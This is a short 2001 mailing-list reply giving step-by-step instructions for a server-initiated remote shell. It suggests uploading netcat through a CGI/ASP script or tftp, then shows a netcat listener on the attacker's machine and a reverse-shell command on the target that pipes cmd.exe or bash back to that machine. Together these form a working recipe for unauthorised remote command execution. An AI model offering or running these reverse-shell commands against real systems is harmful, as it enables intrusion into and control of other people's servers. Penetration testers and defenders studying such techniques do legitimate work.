Re: Server initiated remote shell

From: Bill Pennington (billpat_private)
Date: Fri Sep 21 2001 - 14:51:08 PDT

    You want netcat, you can find in on packetstorm.

    What you will need to do first is build an CGI/ASP script to upload your
    code, assuming you can't just tftp it from the internal system.

    Then on your box execute:

    nc -l -p 80

    On the remote server execute

    nc <yourbox> 80 -e c:\winnt\system32\cmd.exe or /usr/bin/bash or
    whatever command interpeter is handy. You will then see a command prompt
    appear on your local box.

    Sounds like the hard part will be getting netcat on the box. Good luck!

    --

    Bill Pennington - CISSP